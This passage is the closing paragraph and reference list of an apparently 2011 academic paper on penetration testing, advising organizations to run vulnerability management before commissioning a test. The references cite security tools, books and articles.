Organizations that bear network security risk should engage in an ongoing vulnerability management program. A vulnerability management program includes ongoing vulnerability assessments, ongoing vulnerability remediation, and risk measurements. When the vulnerability management program measurements provide a given level of confidence, it is then time to test the security assertions and perform a penetration test. An organization should only engage in a penetration test once they are confident that what they want tested is secure. If your organization does not include a vulnerability management program, there is no sense in taking a test. Before the student takes a test, the student must prepare. The great Master Kan once said to his student: "When you can take the pebble from my hand, it will be time for you to leave". Similarly, when the Vulnerability Management program measurements indicate that one is secure, it is time for the test. REFERENCES [1] McGraw, G. (2006). Software Security: Building Security In, Adison Wesley Professional. [2] The Canadian Institute of Chartered Accountants Information Technology Advisory Committee, (2003) Using an Ethical hacking Technique to Assess Information Security Risk, Toronto Canada. http://www.cica.ca/research-and-guidance/documents/it-advisory-committee/item12038.pdf, accessed on Nov. 23, 2011. [3] Mohanty, D. Demystifying Penetration Testing HackingSpirits, http://www.infosecwriters.com/text_resources/pdf/pen_test2.pdf, accessed on Nov. 23, 2011. [4] Penetraion Testing Guide, http://www.penetration-testing.com/ [5] iVolution Security Technologies, Benefits of Penetration Testing, http://www.ivolutionsecurity.com/pen_testing/benefits.php, accessed on Nov. 23, 2011. [6] Shewmaker, J. (2008). Introduction to Penetration Testing, http://www.dts.ca.gov/pdf/news_events/SANS_InstituteIntroduction_to_Network_Penetration_Testing.pdf, accessed on Nov. 23, 2011. [7] Application Penetration Testing, https://www.trustwave.com/apppentest.php, accessed on Nov. 23, 2011. [8] Mullins, M. (2005) Choose the Best Penetration Testing Method for your Company, http://www.techrepublic.com/article/choose-the-best-penetration-testing-method-for-yourcompany/ 5755555, accessed on Nov. 23, 2011. [9] Saindane, M. Penetration Testing A Systematic Approach, http://www.infosecwriters.com/text_resources/pdf/PenTest_MSaindane.pdf, accessed on Nov. 23, 2011. [10] Nmap Free Security Scanner for Network Explorer, http://nmap.org/, accessed on Nov. 23, 2011. [11] Sanfilippo, S. Hping Active Network Security Tool, http://www.hping.org/, accessed on Nov. 23, 2011. [12] Superscan, http://www.mcafee.com/us/downloads/free-tools/superscan.aspx, accessed on Nov. 23, 2011. [13] Xprobe2, http://www.net-security.org/software.php?id=231, accessed on Nov. 23, 2011. International Journal of Network Security & Its Applications (IJNSA), Vol.3, No.6, November 2011 38 [14] P0f, http://www.net-security.org/software.php?id=164, accessed on Nov. 23, 2011. [15] Httprint, http://net-square.com/httprint/, accessed on Nov. 23, 2011. [16] Nessus, http://www.tenable.com/products/nessus, accessed on Nov. 23, 2011. [17] Shadow Security Scanner, http://www.safety-lab.com/en/download.htm, accessed on Nov. 23, 2011. [18] Iss Scanner, http://shareme.com/showtop/freeware/iss-scanner.html, accessed on Nov. 23, 2011. [19] GFI LAN guard, http://www.gfi.com/network-security-vulnerability-scanner, accessed on Nov. 23, 2011. [20] Brutus, http://download.cnet.com/Brutus/3000-2344_4-10455770.html, accessed on Nov. 23, 2011. [21] MetaSploit, http://www.metasploit.com/, accessed on Nov. 23, 2011.
[22] Skoudis, E. Powerful Payloads: The Evolution of Exploit Frameworks, (2005). http://searchsecurity.techtarget.com/news/1135581/Powerful-payloads-The-evolution-ofexploitframeworks, accessed on Nov. 23, 2011. [23] Andreu, A. (2006). Professional Pen Testing for Web Applications. Wrox publisher, 1st edition. [24] OWASP. Web Application Penetration Testing, http://www.owasp.org/index.php/Web_Application_Penetration_Testing, accessed on Nov. 23, 2011. [25] Fiddler, http://www.fiddler2.com/fiddler2, accessed on Nov. 23, 2011. [26] Stuttard, D. and Pinto, M. (2008) The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws,, Wiley. 1st edition. [27] White Paper on Penetration Testing, http://www.docstoc.com/docs/70280500/White-Paper-onPenetration-Testing, accessed on Nov. 23, 2011. [28] Neumann, P. (1977) Computer System Security Evaluation, Proceedings of AFIPS 1977 Natl. Computer Conf., Vol. 46, pp. 1087-1095. [29] Pfleeger, C. P., Pfleeger, S. L., and Theofanos, M. F. (1989) A Methodology for Penetration Testing, Computers &Security, 8(1989) pp. 613-620. [30] Bishop, M. (2007) About Penetration Testing, IEEE Security & Privacy, November/December 2007, pp. 84-87. [31] Arkin, B., Stender, S., and McGraw, G. Software Penetration Testing, IEEE Security & Privacy, January/Feburary 2005, pp. 32-35. [32] http://resources.infosecinstitute.com/nmap/ [33] http://pwcrack.com.penetration.shtml [34] http://eternasecurity.com